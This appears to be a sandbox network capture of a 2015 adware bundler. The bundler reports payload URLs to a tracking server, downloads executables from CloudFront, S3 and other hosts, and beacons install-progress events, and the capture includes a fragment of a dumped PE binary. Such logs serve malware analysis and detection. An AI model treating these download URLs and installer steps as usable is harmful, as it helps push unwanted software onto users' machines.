User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:12 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:12 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:12 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:14 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:14 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:15 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:15 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:15 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:15 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:16 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:16 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:29 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:29 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:46 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:46 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:49 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:49 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:56 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:56 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:57 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:57 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:39:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Sep 2015 06:40:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:40:00 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:45 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 02 Sep 15 06:39:00 GMT
Set-Cookie: _c4aid=F697A5F90EAA4DBF83ECCC091C097DC5; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F697A5F90EAA4DBF83ECCC091C097DC5,1441175985.94416; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:16 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1440084186"
Last-Modified: Thu, 20 Aug 2015 15:23:06 GMT
Cache-Control: max-age=20696
Content-Length: 100486
Content-Type: application/octet-stream
X-HW: 1441175956.dop018.am4.t,1441175956.cds053.am4.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`..8............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...8....`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=5890 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: uv0WxhI1 lZNQGeNmyUyaVJYlSGVT2psgs4X7mc4YetHdTbKTcYE1Ufhbly3CdsVmgFzOelYezU=
x-amz-request-id: 18209098B93D81A8
Date: Wed, 02 Sep 2015 06:39:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=8163 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ja16wiktBzYkozOMWCCMeVWIOMc4pY3FY9jX662xbpe foeWOhu/6pT94foTZ7yKO4jlYI9ymI8=
x-amz-request-id: 8D9E6A0F0CADB59F
Date: Wed, 02 Sep 2015 06:39:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=6404 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: jk06f 20MqiVRmhiPUNjGIeRUikAXjDTzWQfg16wjdxXJIpkwyIPwMWtscQ pEDcwoYioiCqtiM=
x-amz-request-id: 113E11ECA0528EA6
Date: Wed, 02 Sep 2015 06:39:18 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: jk06f 20MqiVRmhiPUNjGIeRUikAXjDTzWQfg16wjdxXJIpkwyIPwMWtscQ pEDcwoYioiCqtiM=..x-amz-request-id: 113E11ECA0528EA6..Date: Wed, 02 Sep 2015 06:39:18 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1711 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 6PDlbR9lr LNC5cfL8PifHjlB5nNMB6RpkXB1uZ0ybuWk5JKEtncIvWwEBrwYmZ58Nv/WRO3GBA=
x-amz-request-id: CB55A3AC81E6CE99
Date: Wed, 02 Sep 2015 06:39:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 6PDlbR9lr LNC5cfL8PifHjlB5nNMB6RpkXB1uZ0ybuWk5JKEtncIvWwEBrwYmZ58Nv/WRO3GBA=..x-amz-request-id: CB55A3AC81E6CE99..Date: Wed, 02 Sep 2015 06:39:23 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=1250 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Y6DeCxKW3Q9RI4ndTCLI2dUnAc5Kww2I39DDPYeLY eXa 8LcqWkAj2DyiBYHTEFDfkQFhAXWHE=
x-amz-request-id: 561C039F0DA9BDB2
Date: Wed, 02 Sep 2015 06:39:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Y6DeCxKW3Q9RI4ndTCLI2dUnAc5Kww2I39DDPYeLY eXa 8LcqWkAj2DyiBYHTEFDfkQFhAXWHE=..x-amz-request-id: 561C039F0DA9BDB2..Date: Wed, 02 Sep 2015 06:39:26 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=3154 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: fkCkt6obbbHcVc Ezre046lgkW O9BheB0jL6hk8PpCkl4m3TESfDy8KT6AWJPDMnP8OXNe1dNk=
x-amz-request-id: E361A47DB0808D42
Date: Wed, 02 Sep 2015 06:39:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: fkCkt6obbbHcVc Ezre046lgkW O9BheB0jL6hk8PpCkl4m3TESfDy8KT6AWJPDMnP8OXNe1dNk=..x-amz-request-id: E361A47DB0808D42..Date: Wed, 02 Sep 2015 06:39:36 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=6008 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: E0nJoZPzH6UQYOUrE1T7xC 85vHAIA2MC4HqsApLsOf7TfxMc6bkxLS46 kWLGDb Au1UA iIA0=
x-amz-request-id: 6CFBDB0B49423DAB
Date: Wed, 02 Sep 2015 06:39:38 GMT
